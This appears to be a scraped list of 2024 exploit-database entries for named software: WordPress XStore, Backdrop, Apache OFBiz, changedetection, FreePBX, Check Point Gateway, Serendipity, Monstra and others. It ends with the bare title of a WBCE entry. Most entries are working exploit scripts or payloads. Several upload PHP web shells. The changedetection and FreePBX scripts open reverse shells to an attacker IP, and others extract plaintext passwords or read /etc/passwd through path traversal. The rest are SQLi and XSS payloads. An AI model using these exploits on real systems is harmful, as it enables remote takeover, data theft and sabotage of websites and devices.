-
Wordpress Theme XStore 9.3.8 - SQLi
# Exploit Title: Wordpress Theme XStore 9.3.8 - SQLi # Google Dork: N/A # Date: 2024-05-16 # Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly) # Version: 5.3.5 # Tested on: Windows10 # CVE: CVE-2024-33559 Poc <https://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection#poc> POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: keep-alive Upgrade-Insecure-Requests: 1
-
Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE)
# Exploit Title: Backdrop CMS 1.27.1 - Authenticated Remote Command Execution (RCE) # Date: 04/27/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://backdropcms.org/ # Software Link: https://github.com/backdrop/backdrop/releases/download/1.27.1/backdrop.zip # Version: latest # Tested on: MacOS import os import time import zipfile def create_files(): info_content = """ type = module name = Block description = Controls the visual building blocks a page is constructed with. Blocks are boxes of content rendered into an area, or region, of a web page. package = Layouts tags[] = Blocks tags[] = Site Architecture version = BACKDROP_VERSION backdrop = 1.x configure = admin/structure/block ; Added by Backdrop CMS packaging script on 2024-03-07 project = backdrop version = 1.27.1 timestamp = 1709862662 """ shell_info_path = "shell/shell.info" os.makedirs(os.path.dirname(shell_info_path), exist_ok=True) # Klasörüoluşturur with open(shell_info_path, "w") as file: file.write(info_content) shell_content = """ <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> """ shell_php_path = "shell/shell.php" with open(shell_php_path, "w") as file: file.write(shell_content) return shell_info_path, shell_php_path def create_zip(info_path, php_path): zip_filename = "shell.zip" with zipfile.ZipFile(zip_filename, 'w') as zipf: zipf.write(info_path, arcname='shell/shell.info') zipf.write(php_path, arcname='shell/shell.php') return zip_filename def main(url): print("Backdrop CMS 1.27.1 - Remote Command Execution Exploit") time.sleep(3) print("Evil module generating...") time.sleep(2) info_path, php_path = create_files() zip_filename = create_zip(info_path, php_path) print("Evil module generated!", zip_filename) time.sleep(2) print("Go to " + url + 
"/admin/modules/install and upload the " + zip_filename + " for Manual Installation.") time.sleep(2) print("Your shell address:", url + "/modules/shell/shell.php") if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python script.py [url]") else: main(sys.argv[1])
-
Apache OFBiz 18.12.12 - Directory Traversal
# Exploit Title: Apache OFBiz 18.12.12 - Directory Traversal # Google Dork: N/A # Date: 2024-05-16 # Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly) # Vendor Homepage: https://ofbiz.apache.org/ ## Software Link: https://ofbiz.apache.org/download.html # Version: below <=18.12.12 # Tested on: Windows10 Poc. 1- POST /webtools/control/xmlrpc HTTP/1.1 Host: vulnerable-host.com Content-Type: text/xml <?xml version="1.0"?> <methodCall> <methodName>example.createBlogPost</methodName> <params> <param> <value><string>../../../../../../etc/passwd</string></value> </param> </params> </methodCall> OR 2- POST /webtools/control/xmlrpc HTTP/1.1 Host: vulnerable-host.com Content-Type: text/xml <?xml version="1.0"?> <methodCall> <methodName>performCommand</methodName> <params> <param> <value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value> </param> </params> </methodCall>
-
PopojiCMS 2.0.1 - Remote Command Execution (RCE)
# Exploit Title: PopojiCMS 2.0.1 - Remote Command Execution # Date: 14/04/2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.popojicms.org/ # Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip # Version: Version : 2.0.1 # Tested on: https://www.softaculous.com/apps/cms/PopojiCMS import requests import time import sys def exploit(url, username, password): login_url = f"{url}/po-admin/route.php?mod=login&act=proclogin" login_data = {"username": username, "password": password} headers = {"Content-Type": "application/x-www-form-urlencoded", "Referer": f "{url}/po-admin/index.php"} session = requests.Session() login_response = session.post(login_url, data=login_data, headers=headers) if "Administrator PopojiCMS" in login_response.text: print("Login Successful!") time.sleep(1) # 1 saniye bekle else: print("Login Failed!") return edit_url = f"{url}/po-admin/route.php?mod=setting&act=metasocial" edit_data = {"meta_content": """<html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html>"""} edit_response = session.post(edit_url, data=edit_data, headers=headers) if "cmd" in edit_response.text: print("Your shell is ready:", url) time.sleep(1) else: print("Exploit Failed!") return if __name__ == "__main__": if len(sys.argv) != 4: print("Kullanım: python exploit.py sitename username password") sys.exit(1) url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] print("Exploiting...") time.sleep(1) print("Logging in...") time.sleep(1) exploit(url, username, password)
-
htmlLawed 1.2.5 - Remote Code Execution (RCE)
# Exploit Title: htmlLawed 1.2.5 - Remote Code Execution (RCE) # Date: 2024-04-24 # Exploit Author: Miguel Redondo (aka d4t4s3c) # Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed # Software Link: https://github.com/kesar/HTMLawed # Version: <= 1.2.5 # Tested on: Linux # CVE: CVE-2022-35914 banner(){ echo " ______ _______ ____ ___ ____ ____ _________ ___ _ _ _" echo " / ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ / ___|/ _ \/ | || |" echo "| | \ \ / /| _| _____ __) | | | |__) | __) |____ |_ \___ \ (_) | | || |_" echo "| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) |__) \__, | |__ _|" echo " \____| \_/ |_____| |_____|\___/_____|_____| |____/____/ /_/|_| |_|" } while getopts ":u:c:" arg; do case $arg in u) URL=$OPTARG; let parameter_counter+=1 ;; c) CMD=$OPTARG; let parameter_counter+=1 ;; esac done if [ -z "$URL" ] || [ -z "$CMD" ]; then banner echo -e "\n[i] Usage: ${0} -u <URL> -c <CMD>\n" exit else banner echo -e "\n[+] Command output:" fi curl -s -d "sid=foo&hhook=exec&text=${CMD}" -b "sid=foo" ${URL} | egrep '\ \[[0-9]+\] =\>'| sed -E 's/\ \[[0-9]+\] =\> (.*)<br \/>/\1/'
-
BWL Advanced FAQ Manager 2.0.3 - Authenticated SQL Injection
Exploit Title: BWL Advanced FAQ Manager 2.0.3 - Authenticated SQL Injection Date: 14 Apr 2024 Exploit Author: Ivan Spiridonov (xbz0n) Software Link: https://codecanyon.net/item/bwl-advanced-faq-manager/5007135 Version: 2.0.3 Tested on: Ubuntu 20.04 CVE: CVE-2024-32136 SQL Injection SQL injection is a type of security vulnerability that allows an attacker to interfere with an application's database queries. It usually involves the insertion or "injection" of an SQL query via the input data from the client into the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutting down the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system. Affected Components Plugin: BWL Advanced FAQ Manager Version: 2.0.3 Affected Parameter: 'date_range' Affected Page: /wp-admin/edit.php Description The vulnerability exists within the 'date_range' parameter used in the 'bwl-advanced-faq-analytics' page of the BWL Advanced FAQ Manager plugin. Authenticated attackers can execute arbitrary SQL commands within the database by manipulating the input to this parameter. 
Proof of Concept Manual Exploitation The following GET request demonstrates the vulnerability: GET /wp-admin/edit.php?page=bwl-advanced-faq-analytics&post_type=bwl_advanced_faq&filter_type=views&date_range=(select*from(select(sleep(20)))a)&faq_id=all HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://localhost/wp-admin/edit.php?post_type=bwl_advanced_faq&page=bwl-advanced-faq-analytics Connection: close Cookie: [Relevant Cookies] Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability. Recommendations BWL Advanced FAQ Manager v2.0.3 users are advised to update the plugin to the fixed version v2.0.4.
-
iMLog < 1.307 - Persistent Cross Site Scripting (XSS)
# Exploit Title: iMLog < 1.307 - Persistent Cross Site Scripting (XSS) # Date: 22/5/2024 # Exploit Author: Gabriel Felipe # Vendor Homepage: https://itssglobal.com # Software Link: https://itssglobal.com/index.php/imlog/ # Version: 1.307 # Tested on: Firefox and Chrome Browsers # Patched Version: 1.308 # Category: Web Application # PoC: iMLog < 1.307 is vulnerable to persistent cross-site scripting (XSS) via the "User Management" feature. An attacker could inject malicious JavaScript code into a user account under their control, so that when an admin opens "User Maintenance" the code is executed; this could lead to the creation of new admin users, resulting in privilege escalation. 1. Log in to the user account 2. Go to Setup > "User Maintenance" 3. Click on "Search" and then select your UserID. 4. Change the "Last Name" input to `<img/src/onerror=prompt('XSS')>` 5. Click on "Save" 6. Refresh the page; the XSS will be triggered.
-
ElkArte Forum 1.1.9 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title : ElkArte Forum 1.1.9 - Remote Code Execution (RCE) (Authenticated) # Date: 2024-5-24 # Exploit Author: tmrswrr # Category: Webapps # Vendor Homepage: https://www.elkarte.net/ # Software Link : https://github.com/elkarte/Elkarte/releases/download/v1.1.9/ElkArte_v1-1-9_install.zip # Version : 1.1.9 1) After login go to Manage and Install theme > https://127.0.0.1/ElkArte/index.php?action=admin;area=theme;sa=admin;c2e3e39a0d=276c2e3e39a0d65W2qg1voAFfX1yNc5m 2) Upload test.zip file and click install > test.zip > test.php > <?php echo system('id'); ?> 3) Go to Theme Setting > Theme Directory > https://127.0.0.1/ElkArte/themes/test/test.php Result : uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte) uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte)
-
changedetection < 0.45.20 - Remote Code Execution (RCE)
# Exploit Title: changedetection <= 0.45.20 Remote Code Execution (RCE) # Date: 5-26-2024 # Exploit Author: Zach Crosman (zcrosman) # Vendor Homepage: changedetection.io # Software Link: https://github.com/dgtlmoon/changedetection.io # Version: <= 0.45.20 # Tested on: Linux # CVE : CVE-2024-32651 from pwn import * import requests from bs4 import BeautifulSoup import argparse def start_listener(port): listener = listen(port) print(f"Listening on port {port}...") conn = listener.wait_for_connection() print("Connection received!") context.newline = b'\r\n' # Switch to interactive mode conn.interactive() def add_detection(url, listen_ip, listen_port, notification_url=''): session = requests.Session() # First request to get CSRF token request1_headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } response = session.get(url, headers=request1_headers) soup = BeautifulSoup(response.text, 'html.parser') csrf_token = soup.find('input', {'name': 'csrf_token'})['value'] print(f'Obtained CSRF token: {csrf_token}') # Second request to submit the form and get the redirect URL add_url = f"{url}/form/add/quickwatch" add_url_headers = { # Define add_url_headers here "Origin": url, "Content-Type": "application/x-www-form-urlencoded" } add_url_data = { "csrf_token": csrf_token, "url": "https://reddit.com/r/baseball", "tags": '', "edit_and_watch_submit_button": "Edit > Watch", "processor": "text_json_diff" } post_response = session.post(add_url, headers=add_url_headers, data=add_url_data, allow_redirects=False) # Extract the URL from the Location header if 'Location' in post_response.headers: redirect_url = post_response.headers['Location'] print(f'Redirect URL: {redirect_url}') else: print('No redirect URL found') return 
# Third request to add the changedetection url with ssti in notification config save_detection_url = f"{url}{redirect_url}" save_detection_headers = { # Define save_detection_headers here "Referer": redirect_url, "Cookie": f"session={session.cookies.get('session')}" } save_detection_data = { "csrf_token": csrf_token, "url": "https://reddit.com/r/all", "title": '', "tags": '', "time_between_check-weeks": '', "time_between_check-days": '', "time_between_check-hours": '', "time_between_check-minutes": '', "time_between_check-seconds": '30', "filter_failure_notification_send": 'y', "fetch_backend": 'system', "webdriver_delay": '', "webdriver_js_execute_code": '', "method": 'GET', "headers": '', "body": '', "notification_urls": notification_url, "notification_title": '', "notification_body": f""" {{% for x in ().__class__.__base__.__subclasses__() %}} {{% if "warning" in x.__name__ %}} {{{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\\"{listen_ip}\\",{listen_port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\\"/bin/bash\\")'").read()}}}} {{% endif %}} {{% endfor %}} """, "notification_format": 'System default', "include_filters": '', "subtractive_selectors": '', "filter_text_added": 'y', "filter_text_replaced": 'y', "filter_text_removed": 'y', "trigger_text": '', "ignore_text": '', "text_should_not_be_present": '', "extract_text": '', "save_button": 'Save' } final_response = session.post(save_detection_url, headers=save_detection_headers, data=save_detection_data) print('Final request made.') if __name__ == "__main__": parser = argparse.ArgumentParser(description='Add detection and start listener') parser.add_argument('--url', type=str, required=True, help='Base URL of the target site') parser.add_argument('--port', type=int, help='Port for the listener', default=4444) parser.add_argument('--ip', type=str, required=True, help='IP address for the listener') parser.add_argument('--notification', 
type=str, help='Notification url if you don\'t want to use the system default') args = parser.parse_args() add_detection(args.url, args.ip, args.port, args.notification) start_listener(args.port)
-
Aquatronica Control System 5.1.6 - Information Disclosure
#!/usr/bin/env python # -*- coding: utf-8 -*- # # # Aquatronica Control System 5.1.6 Passwords Leak Vulnerability # # # Vendor: Aquatronica s.r.l. # Product web page: https://www.aquatronica.com # Affected version: Firmware: 5.1.6 # Web: 2.0 # # Summary: Aquatronica's electronic AQUARIUM CONTROLLER is easy # to use, allowing you to control all the electrical devices in # an aquarium and to monitor all their parameters; it can be used # for soft water aquariums, salt water aquariums or both simultaneously. # # Desc: The tcp.php endpoint on the Aquatronica controller is exposed # to unauthenticated attackers over the network. This vulnerability # allows remote attackers to send a POST request which can reveal # sensitive configuration information, including plaintext passwords. # This can lead to unauthorized access and control over the aquarium # controller, compromising its security and potentially allowing attackers # to manipulate its settings. # # Tested on: Apache/2.0.54 (Unix) # PHP/5.4.17 # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2024-5824 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php # # # 04.05.2024 # import requests, html, re, sys, time from urllib.parse import unquote program = "TCP" command = "ws_get_network_cfg" function_id = "TCP_XML_REQUEST" print(""" _________ . . (.. \_ , |\ /| \ O \ /| \ \/ / \______ \/ | \ / vvvv\ \ | / | \^^^^ == \_/ | `\_ === \. 
| / /\_ \ / | |/ \_ \| / ___ ______________\________/________aquatronica_0day___ | | | | | | """) if len(sys.argv) != 2: print("Usage: python aqua.py <ip:port>") sys.exit(1) ip = sys.argv[1] url = f"http://{ip}/{program.lower()}.php" post_data = {'function_id' : function_id.lower(), 'command' : command.upper()} r = requests.post(url, data=post_data) if r.status_code == 200: r_d = unquote(r.text) f_d_r = html.unescape(r_d) regex = r'pwd="([^"]+)"' rain = re.findall(regex, f_d_r) for drops in rain: print(' ',drops) time.sleep(0.5) else: print(f"Dry season! {r.status_code}")
-
Check Point Security Gateway - Information Disclosure (Unauthenticated)
# Exploit Title: Check Point Security Gateway - Information Disclosure (Unauthenticated) # Exploit Author: Yesith Alvarez # Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336 # Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20 # CVE : CVE-2024-24919 from requests import Request, Session import sys import json def title(): print(''' _______ ________ ___ ___ ___ _ _ ___ _ _ ___ __ ___ / ____\ \ / / ____| |__ \ / _ \__ \| || | |__ \| || | / _ \/_ |/ _ \ | | \ \ / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) | | | \ \/ / | __|______/ /| | | |/ /|__ _|______/ /|__ _\__, || |\__, | | |____ \ / | |____ / /_| |_| / /_ | | / /_ | | / / | | / / \_____| \/ |______| |____|\___/____| |_| |____| |_| /_/ |_| /_/ Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ ''') def exploit(url, path): url = url + '/clients/MyCRL' data = "aCSHELL/../../../../../../../../../../.."+ path headers = { 'Connection': 'keep-alive', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0' } s = Session() req = Request('POST', url, data=data, headers=headers) prepped = req.prepare() #del prepped.headers['Content-Type'] resp = s.send(prepped, verify=False, timeout=15 ) print(prepped.headers) print(url) print(resp.headers) print(resp.status_code) if __name__ == '__main__': title() if(len(sys.argv) < 3): print('[+] USAGE: python3 %s https://<target_url> path\n'%(sys.argv[0])) print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n'%(sys.argv[0])) exit(0) else: exploit(sys.argv[1],sys.argv[2])
-
Akaunting 3.1.8 - Server-Side Template Injection (SSTI)
# Exploit Title: Akaunting 3.1.8 - Server-Side Template Injection (SSTI) # Exploit Author: tmrswrr # Date: 30/05/2024 # Vendor: https://akaunting.com/forum # Software Link: https://akaunting.com/apps/crm # Vulnerable Version(s): 3.1.8 # Tested : https://www.softaculous.com/apps/erp/Akaunting 1 ) Log in with admin credentials and go to: Items > New Item https://127.0.0.1/Akaunting/1/common/items 2 ) Write the SSTI payload {{7*7}} in the Name field, and random numbers in the Sale and Purchase Price fields 3 ) Save it 4 ) You will see the result: 49 ==================================================================================== 1 ) Log in with admin credentials and go to: Settings > Taxes > New Tax https://127.0.0.1/Akaunting/1/settings/taxes/1/edit 2 ) Write the SSTI payload {{7*7}} in the Name field, and random numbers in the Sale and Purchase Price fields 3 ) Save it 4 ) You will see the result: 49 > {{'a'.toUpperCase()}} > A > {{'a'.concat('b')}} > ab ==================================================================================== 1 ) Log in with admin credentials and go to: Banking > Transactions > New Income https://127.0.0.1/Akaunting/1/banking/transactions/create?type=income 2 ) Write the SSTI payload {{7*7}} in the Description field 3 ) Save it 4 ) You will see the result: 49 > {{'a'.toUpperCase()}} > A > {{'a'.concat('b')}} > ab ======================================================================================= 1 ) Log in with admin credentials and go to: https://127.0.0.1/Akaunting/1/purchases/vendors/1/edit 2 ) Write the SSTI payload {{7*7}} in the Name field 3 ) Save it 4 ) You will see the result: 49 > {{'a'.toUpperCase()}} > A > {{'a'.concat('b')}} > ab
-
Sitefinity 15.0 - Cross-Site Scripting (XSS)
# Exploit Title: Sitefinity 15.0 - Cross-Site Scripting (XSS) # Date: 2023-12-05 # Exploit Author: Aldi Saputra Wahyudi # Vendor Homepage: https://www.progress.com/sitefinity-cms # Version: < 15.0.0 # Tested on: Windows/Linux # CVE : CVE-2023-27636 # Description: In the backend of the Sitefinity CMS, a cross-site scripting vulnerability has been discovered in all features that use the SF-Editor # Steps To Reproduce: Attacker: a lower-privileged user; Victim: a higher-privileged user 1. Log in as the Attacker 2. Go to a feature that uses the SF Editor, e.g. the news page 3. Create or edit a news item 4. In the content form, insert the XSS payload as HTML 5. After the payload is inserted, click on the content form (just click) and publish or save 6. If the victim visits the page with the XSS payload, the XSS will be triggered Payload: <noalert><iframe src="javascript:alert(document.domain);">
-
FreePBX 16 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: FreePBX 16 - Remote Code Execution (RCE) (Authenticated) # Exploit Author: Cold z3ro # Date: 6/1/2024 # Tested on: 14,15,16 # Vendor: https://www.freepbx.org/ <?php /// /// FREEPBX [14,15,16] API Module Authenticated RCE /// Orginal Difcon || https://www.youtube.com/watch?v=rqFJ0BxwlLI /// Cod[3]d by Cold z3ro /// $url = "10.10.10.186"; // remote host $backconnectip = "192.168.0.2"; $port = "4444"; $PHPSESSID = "any valid session even extension"; echo "checking $url\n"; $url = trim($url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'http://'.$url.'/admin/ajax.php?module=api&command=generatedocs'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST'); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 2); curl_setopt($ch, CURLOPT_TIMEOUT, 2); curl_setopt($ch, CURLOPT_HTTPHEADER, [ 'Referer: http://'.$url.'/admin/config.php?display=api', 'Content-Type: application/x-www-form-urlencoded', ]); curl_setopt($ch, CURLOPT_COOKIE, 'PHPSESSID='.$PHPSESSID); curl_setopt($ch, CURLOPT_POSTFIELDS, 'scopes=rest&host=http://'.$backconnectip.'/$(bash -1 >%26 /dev/tcp/'.$backconnectip.'/4444 0>%261)'); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); echo $response = curl_exec($ch)."\n"; curl_close($ch); ?>
-
Serendipity 2.5.0 - Remote Code Execution (RCE)
# Exploit Title: Serendipity 2.5.0 - Remote Code Execution (RCE) # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 26.04.2024 # Vendor Homepage: https://docs.s9y.org/ # Software Link:https://www.s9y.org/latest # Tested Version: v2.5.0 (latest) # Tested on: MacOS import requests import time import random import string from bs4 import BeautifulSoup def generate_filename(extension=".inc"): return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) + extension def get_csrf_token(response): soup = BeautifulSoup(response.text, 'html.parser') token = soup.find('input', {'name': 'serendipity[token]'}) return token['value'] if token else None def login(base_url, username, password): print("Logging in...") time.sleep(2) session = requests.Session() login_page = session.get(f"{base_url}/serendipity_admin.php") token = get_csrf_token(login_page) data = { "serendipity[action]": "admin", "serendipity[user]": username, "serendipity[pass]": password, "submit": "Login", "serendipity[token]": token } headers = { "Content-Type": "application/x-www-form-urlencoded", "Referer": f"{base_url}/serendipity_admin.php" } response = session.post(f"{base_url}/serendipity_admin.php", data=data, headers=headers) if "Add media" in response.text: print("Login Successful!") time.sleep(2) return session else: print("Login Failed!") return None def upload_file(session, base_url, filename, token): print("Shell Preparing...") time.sleep(2) boundary = "---------------------------395233558031804950903737832368" headers = { "Content-Type": f"multipart/form-data; boundary={boundary}", "Referer": f"{base_url} /serendipity_admin.php?serendipity[adminModule]=media" } payload = ( f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"serendipity[token]\"\r\n\r\n" f"{token}\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"serendipity[action]\"\r\n\r\n" f"admin\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"serendipity[adminModule]\"\r\n\r\n" 
f"media\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"serendipity[adminAction]\"\r\n\r\n" f"add\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"serendipity[userfile][1]\"; filename=\"(unknown)\"\r\n" f"Content-Type: text/html\r\n\r\n" "<html>\n<body>\n<form method=\"GET\" name=\"<?php echo basename($_SERVER['PHP_SELF']); ?>\">\n" "<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input type=\"SUBMIT\" value=\"Execute\">\n" "</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n} \n?>\n</pre>\n</body>\n</html>\r\n" f"--{boundary}--\r\n" ) response = session.post(f"{base_url} /serendipity_admin.php?serendipity[adminModule]=media", headers=headers, data=payload.encode('utf-8')) if f"File (unknown) successfully uploaded as" in response.text: print(f"Your shell is ready: {base_url}/uploads/(unknown)") else: print("Exploit Failed!") def main(base_url, username, password): filename = generate_filename() session = login(base_url, username, password) if session: token = get_csrf_token(session.get(f"{base_url} /serendipity_admin.php?serendipity[adminModule]=media")) upload_file(session, base_url, filename, token) if __name__ == "__main__": import sys if len(sys.argv) != 4: print("Usage: python script.py <siteurl> <username> <password>") else: main(sys.argv[1], sys.argv[2], sys.argv[3])
-
Dotclear 2.29 - Remote Code Execution (RCE)
# Exploit Title: Dotclear 2.29 - Remote Code Execution (RCE) # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 26.04.2024 # Vendor Homepage: https://git.dotclear.org/explore/repos # Software Link: https://github.com/dotclear/dotclear/archive/refs/heads/master.zip # Tested Version: v2.29 (latest) # Tested on: MacOS import requests import time import random import string from bs4 import BeautifulSoup def generate_filename(extension=".inc"): return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) + extension def get_csrf_token(response_text): soup = BeautifulSoup(response_text, 'html.parser') token = soup.find('input', {'name': 'xd_check'}) return token['value'] if token else None def login(base_url, username, password): print("Exploiting...") time.sleep(1) print("Logging in...") time.sleep(1) session = requests.Session() login_data = { "user_id": username, "user_pwd": password } login_url = f"{base_url}/admin/index.php?process=Auth" login_response = session.post(login_url, data=login_data) if "Logout" in login_response.text: print("Login Successful!") return session else: print("Login Failed!") return None def upload_file(session, base_url, filename): print("Shell Preparing...") time.sleep(1) boundary = "---------------------------376201441124932790524235275389" headers = { "Content-Type": f"multipart/form-data; boundary={boundary}", "X-Requested-With": "XMLHttpRequest" } csrf_token = get_csrf_token(session.get(f"{base_url} /admin/index.php?process=Media").text) payload = ( f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n" f"2097152\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"xd_check\"\r\n\r\n" f"{csrf_token}\r\n" f"--{boundary}\r\n" f"Content-Disposition: form-data; name=\"upfile[]\"; filename=\"(unknown) \"\r\n" f"Content-Type: image/jpeg\r\n\r\n" "<html>\n<body>\n<form method=\"GET\" name=\"<?php echo basename($_SERVER['PHP_SELF']); ?>\">\n" "<input type=\"TEXT\" name=\"cmd\" 
autofocus id=\"cmd\" size=\"80\">\n<input type=\"SUBMIT\" value=\"Execute\">\n" "</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n} \n?>\n</pre>\n</body>\n</html>\r\n" f"--{boundary}--\r\n" ) upload_response = session.post(f"{base_url} /admin/index.php?process=Media&sortby=name&order=asc&nb=30&page=1&q=&file_mode=grid&file_type=&plugin_id=&popup=0&select=0", headers=headers, data=payload.encode('utf-8')) if upload_response.status_code == 200: print(f"Your Shell is Ready: {base_url}/public/(unknown)") else: print("Exploit Failed!") def main(base_url, username, password): filename = generate_filename() session = login(base_url, username, password) if session: upload_file(session, base_url, filename) if __name__ == "__main__": import sys if len(sys.argv) != 4: print("Usage: python script.py <siteurl> <username> <password>") else: base_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] main(base_url, username, password)
-
Monstra CMS 3.0.4 - Remote Code Execution (RCE)
# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (RCE) # Date: 05.05.2024 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://monstra.org/ # Software Link: https://monstra.org/monstra-3.0.4.zip # Version: 3.0.4 # Tested on: MacOS import requests import random import string import time import re import sys if len(sys.argv) < 4: print("Usage: python3 script.py <url> <username> <password>") sys.exit(1) base_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] session = requests.Session() login_url = f'{base_url}/admin/index.php?id=dashboard' login_data = { 'login': username, 'password': password, 'login_submit': 'Log+In' } filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k= 5)) print("Logging in...") response = session.post(login_url, data=login_data) if 'Dashboard' in response.text: print("Login successful") else: print("Login failed") exit() time.sleep(3) edit_url = f'{base_url}/admin/index.php?id=themes&action=add_chunk' response = session.get(edit_url) # CSRF token bulmak için edit sayfasına erişim token_search = re.search(r'input type="hidden" id="csrf" name="csrf" value=" (.*?)"', response.text) if token_search: token = token_search.group(1) else: print("CSRF token could not be found.") exit() content = ''' <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> ''' edit_data = { 'csrf': token, 'name': filename, 'content': content, 'add_file': 'Save' } print("Preparing shell...") response = session.post(edit_url, data=edit_data) time.sleep(3) if response.status_code == 200: print(f"Your shell is ready: {base_url}/public/themes/default/(unknown) .chunk.php") else: print("Failed to prepare shell.")
-
WBCE CMS v1.6.2 - Remote Code Execution (RCE)
